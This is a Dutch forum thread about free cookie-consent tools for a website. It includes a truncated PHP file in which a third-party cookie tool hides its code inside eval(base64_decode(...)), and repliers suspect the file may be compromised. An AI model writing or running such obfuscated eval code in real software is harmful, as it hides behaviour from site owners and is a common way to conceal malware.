Gratis Cookiebericht op je site

Status
Niet open voor verdere reacties.

renzolini

Gebruiker
Lid geworden
5 jun 2006
Ik ben op zoek naar de beste manier om een cookiemelding te maken voor je site.

Nu heb ik er enkel één die informeert maar ik wil één die de melding kan accepteren en opslaan en die een onderscheid maakt tussen de verschillende cookies.

Ik heb op https://www.ecookie.nl/ gebotst maar ik vind het verveld dat hij telkens bovenaan de pagina wordt getoond.

Welke gratis cookiemeldingen gebruiken jullie op je site?

Het ligt eraan wat voor cookies je gebruikt, zijn het analytische cookies of functionele cookies? Mogelijk moet je dan een cookiemuur opwerpen of volstaat een balkje al.

Dus vertel eens meer....

Het ligt eraan wat voor cookies je gebruikt, zijn het analytische cookies of functionele cookies? Mogelijk moet je dan een cookiemuur opwerpen of volstaat een balkje al.

Dus vertel eens meer....

Google analytics hou ik mijn statistieken bij, sociale media zoals facebook en strava, advertenties van google adsense en booking
alvast bedankt voor je reactie

Welke hosting heb je dan, en om welk bestand gaat het?

Welke hosting heb je dan, en om welk bestand gaat het?

ik ben bij www.hostingcompany.be en het bestand dat mijn hosting niet accepteert is cookie_tool.php

Begin van de code is:
HTML:
<?php

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KDQpjbGFzcyBDb29raWVUb29sIHsNCg0KcHJpdmF0ZSAkY29uZmlnOw0KcHJpdmF0ZSAkbGV2ZWw7DQpwcml2YXRlICRmaXJzdCA9IGZhbHNlOw0KDQpwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJGNvbmZpZywgJHdyaXRlID0gZmFsc2UpIHsNCg0KaWYgKCRjb25maWdbJ3JlbWVtYmVyJ10pDQpzZXNzaW9uX3N0YXJ0KCk7DQoNCiR0aGlzLT5jb25maWcgPSAkY29uZmlnOw0KJHRoaXMtPmxldmVsID0gaW50dmFsKCRfQ09PS0lFWydjb29raWVfdG9vbCddKTsNCg0KJHRoaXNfdXJsID0gcGFyc2VfdXJsKENvb2tpZVRvb2w6OmdldF9jdXJyZW50X3VybCgpKTsNCiR0aGF0X3VybCA9IHBhcnNlX3VybCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pOw0KDQppZiAoaXNzZXQoJHRoYXRfdXJsWydob3N0J10pICYmICR0aGlzX3VybFsnaG9zdCddICE9ICR0aGF0X3VybFsnaG9zdCd

Eval = Evil......

Mogelijk gecompromitteerde bestanden van die cookie-tool-site.

Doe online (of in Notepad++) een Base64 Decode van het stukje tussen de aanhalingstekens bij base64_decode("......").
De regel in #9 is niet compleet maar het lijkt erop dat je de php class (want dat is het na een decode) kan aanpassen zodat je zeker weet dat er geen info naar de maker van het bestand gaat.

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan